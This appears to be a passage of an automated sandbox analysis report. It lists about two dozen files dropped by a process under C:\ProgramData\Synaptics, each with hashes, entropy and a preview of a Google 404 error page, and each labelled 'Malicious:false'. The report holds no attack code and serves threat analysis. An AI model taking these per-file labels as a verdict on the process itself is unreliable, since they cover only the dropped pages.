                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0DFSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                              MD5:8ADD4910B834F154E77DC3A21A1D5185
                                                                                                              SHA1:236C1CFB710F673499013CCB2F9C295B644F712C
                                                                                                              SHA-256:F499C61F5CDAF4198A17583263275EE5A847D8D6A10BF2CFC0B4277DE6A54C4A
                                                                                                              SHA-512:BDE40F16BDEA12AC3BDB5CFEF4BCD483874BF183F83AB9C480C6202528977AE060C87AB0908BC3A38CDE9318BE56538A4D43A7B48219A3543E2808D7722ADEEC
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ewEUGjlN9MKsho6t8crxnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.254035729368707
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0N3DbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Mv+pAZewRDK4mW
                                                                                                              MD5:2C179FBF9035B9738372F52D2A9D1F96
                                                                                                              SHA1:CDFCED775FAA0249DEE51E14DB54974AB8F71EFD
                                                                                                              SHA-256:B2B6B473C29B7005C2F9EBF02C5241A7AFD942953CEBE382B78D020DDBFE4F61
                                                                                                              SHA-512:6AA732A7C031D6885F30DA8E727188AABEF792A7BE99C7D7ABE50009AD15C6C18EC21C489CE33A6D5067C1CBCA95FD9CF687AE90659FBB5D880674B1B124C994
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ECd8DPkJwql34ao5saj3ag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265974476180761
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0lcSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                              MD5:5A12239C566A00E5338CBF960B999C17
                                                                                                              SHA1:CD36C168658B02F30B4B10D4FE8195E70B6EB565
                                                                                                              SHA-256:C28FD100A4D7579245E7D69E44CD2C14A81AC92C4EFA16BB143EAB2EA915431C
                                                                                                              SHA-512:88EBBF15A17B4368370282955D8C7BFA4F67B23FBD9A8D1692F453A416447D6937A0D61322EA4A660750AC86DDED8AEB7D3FAC369A84B85AF1F61D3644AAA6E6
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dw0iySNWJifhZBXV-DCOig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.254946725817898
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+06d+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+DE+pAZewRDK4mW
                                                                                                              MD5:E820921B90CD6E1C26ADBB0789E1B4B5
                                                                                                              SHA1:7CDB847A5F4217697FE337BDB7DBC3E9D1E651FA
                                                                                                              SHA-256:3F2DDEF68DC7BFF754901C4789E1FD4E7D80F3DBE61F689A50EDF433A105F6A2
                                                                                                              SHA-512:25C0CB8E363E07814D539709C551B3ED532C3C7A3C525918505B85D388889D85D7FDF0E62CCB894740172F80F8A5E73690E8CA8942CE979911ED24909BECFA20
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eJ5Ol0TCRsTsxnGTZ0TzRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2638850512554045
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0wS3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                              MD5:664C6E4D0FF6BBE637E11C62017E8364
                                                                                                              SHA1:7862094D318ACC8F19C7EC51A0955599BAACE91C
                                                                                                              SHA-256:8CADAF857F8A7CA012F79113C20F11A9174E1F366894A4D5734BD730E03C55AB
                                                                                                              SHA-512:AF3026439FCFA60F3589E8CAAC852E99623B528036F6B9FE393168498A8C7F2B347AF5F27F184AD302A82ACDE2AE16758B9B2104D7B70376DAB681159DA24E8F
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uU_UeTYPPoBpRCUuVL06ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.26668119617933
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0qESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+rE+pAZewRDK4mW
                                                                                                              MD5:5D04E33C51BE44CF631B8C888886A8A1
                                                                                                              SHA1:E34241D60A65D9B41D97E64C3A92B3A797763FEC
                                                                                                              SHA-256:002174EAC31E43D2FABC35594F0553AE0AF4442ECD89474B0B6445839E2C5586
                                                                                                              SHA-512:7D4F5C5446E81648F3DD1C5624F530CC8E45047A691186A1C32A669D92C8CFC3A34D72325D38785A06CE46AB799E47B23A233756D683984A7EFCFA45313F94E9
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U8-srKf0MY4GHnbZGYQr7A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2531590962478685
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0VlSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                                              MD5:07E248F7D1B13EDD6D7F6714748EE34F
                                                                                                              SHA1:A5DBCEF3DFBAFB8DFDD0E1F7A2B10D7610346827
                                                                                                              SHA-256:10B787A1537260DC265A9700268ADB31A1C1C04FA8DCAAE5CD5C8A2190B0E074
                                                                                                              SHA-512:381F783E8BCCB117DA8C0D7B08910EB3A053CC846AD6D36523EDF6A6822A486149DB3841FC391E7609E725A34F81ADE2630AE92DCD5168A5A4156BCE9CAB1C25
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RxPogZno2W2vwIxnybXH8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.256419431735564
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0eSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x+pAZewRDK4mW
                                                                                                              MD5:E8D49E712CB8EA2C67EBEB47E35B67EF
                                                                                                              SHA1:B3C8D10277D66EEB03A53366E66373D2EB4B46F3
                                                                                                              SHA-256:153ECB74AA99A3F42B2D546E76F5D913A84F40967142DED984711720D3162366
                                                                                                              SHA-512:0F9C555CD5EDFCFDE182A61160ED55CF25C54C26E6815724B70B9325407444F68C6185D4425E1CBF0B10AE14CF3BF5B6FC1CE356B062441996A1842295DD5CCD
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dmdqDvW1g1DzH4IQok-hmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265144012786074
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0wRSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x+pAZewRDK4mW
                                                                                                              MD5:F9B245B85DDB79F1F63AD1E7D681E246
                                                                                                              SHA1:B8DAFAEC5616CE78730CCE548CB639B63463FBFF
                                                                                                              SHA-256:5AAF6A202F948BD2810666E59A5858BCC6188D1B51C7865CD5BFCB71F51EA4C0
                                                                                                              SHA-512:F40B8FB14020D8DD5D95D9B69AC86E2E444FC385CF8C58F201541DDA35B3D6875CD05800AF4F94EB7996096D88859A363828B770A774F1F2D4418742305D8589
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="En7v1YgdMJ0U_BvOnkhqIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.27433355846519
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0ebSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                              MD5:EC7AEF14D42F9BB0C6A29F30D2B98787
                                                                                                              SHA1:D36A5194421A5EE6970DCC4C7CDB09C6C34A5B3F
                                                                                                              SHA-256:3447DB040B6767A95FF2C0CF979F289B25E5295BC0024FB9715EFAF24C4E0367
                                                                                                              SHA-512:E1DDF56F301CEC832463F30B929B0685C1C8A66E6C547E58A42DFBA3CA122B745B996FB3F960D3B8CFD55030856231C6356029E123C39979F7BBE98F8E243848
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="B-SSsZvHfmJ9YrOwN9_QZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.261373352139962
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+06nISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+xI+pAZewRDK4mW
                                                                                                              MD5:CF7D67813EADFB04661CAFDD436B5204
                                                                                                              SHA1:34A788572A4EBC3EEAECF8183DB8DCB988D27B85
                                                                                                              SHA-256:036217587FBA426B3D880340D0FCD41FEF02D328621C1EDD3C2D05523B93B520
                                                                                                              SHA-512:FEBCA6FF7C480CCA2F6C8B2EE7365991CED06F6A4024F031C583FA60CA35FAA0C07884C511A63712DA37C8692C5D9F2040CDDF6C7FD00A7622CAC036574E32B5
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="npf706OeeAeN5F81KDLf8Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.256429488058708
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+05SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+e+pAZewRDK4mW
                                                                                                              MD5:4A79E050A0FC86E7E72F329E5E54AC8E
                                                                                                              SHA1:EB0B7921704CF72E2CB201A7872C57A1B58CD82E
                                                                                                              SHA-256:4109A7BF09CAE7110E9FB28BD5FB91ABA98C1625CBA7C7C817D2797727A8290D
                                                                                                              SHA-512:C902B78C3A13A525BDEF072632320A865C96250E9584B30874123453212CE5C49494D1026561D68E9F75F9C4FDD2EAF3D11FE5861C9ABDA83FA765A9D2243AA6
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5XhWkmdW1I8hbA95cjdbjg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.264114504131016
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+06SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                              MD5:EEFA4A09F048033909093C6D68E5944D
                                                                                                              SHA1:F2044796472A3F48626F6726108320F1579E59D2
                                                                                                              SHA-256:64EDB774416ADE731108E6498F969DA82C023DB4D9EA8727B80FB03B42CD8124
                                                                                                              SHA-512:411F1E32853CAE4583B98FE60CCF2398A41A1253B0C89C7EE67E3C7A255DCA5140D060F929BE20F8C38C606EB2645BEE437782AB4045709FC00AB3B5DC901A13
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XPLHiJ4Eqb4iLimLYd4h3A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.253158264490891
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0Ymk2WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Fl2W+pAZewRDK4mW
                                                                                                              MD5:3889A74E84E2555DDC670AAFA59CB89E
                                                                                                              SHA1:1BF79442C18B67C56D90847F31FDC3FF6F8B5949
                                                                                                              SHA-256:33BB2E044A55372DE52107E90E37BD7C0099C7902E90855C26446246ABCD64CB
                                                                                                              SHA-512:711B074D2EBB402D6070A3AB37EA1CDA3C8D29495AAE86FDC8A651CCDE4A5433F548ECF000088379CAC20DDC4D1E2F2FCD129C98375F81EE8E669DC762D1A32F
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="x0sp48kgGlPdeAo9GB_W-Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.255752891854137
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0RDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+q+pAZewRDK4mW
                                                                                                              MD5:E2FC764F0413E109889815EC9C091F06
                                                                                                              SHA1:1D1A2598C454A08E0FA090940F8F573F5E3E89E8
                                                                                                              SHA-256:E0360298F144127050AAB5AE2496204FBE4566A38A9F06B51B83CB09E8CB5DC9
                                                                                                              SHA-512:0F769FAAD36C6559520996D26CA50EA5CA3B13AC9291BF81AFB30B12D48DFDDDC05F615C77658866C35D7D82F7E298BDFEBDE4EE18BDC1C370DEEC70A0F0FE56
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="skwU0KNFjOesw6h5auFPkg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2567806146233975
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+02fSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tf+pAZewRDK4mW
                                                                                                              MD5:446E02573546CA28229018DA65789342
                                                                                                              SHA1:0E136E0C08AB548C1E4B3DBFADE7C6F144D6BFA5
                                                                                                              SHA-256:92B876A973373E06910BD7F095763E1EB7630A2D3E355AADFB1DFA02B6864DD4
                                                                                                              SHA-512:A97F1E4644066315E9C342BCB7A14F955C46C2B16C88113765E87F2EF511878C2428D16E71D3D5EC6674A3316DCB35B3EE8E2E71D3BCF113DCEB8E4A297E032E
                                                                                                              Malicious:false
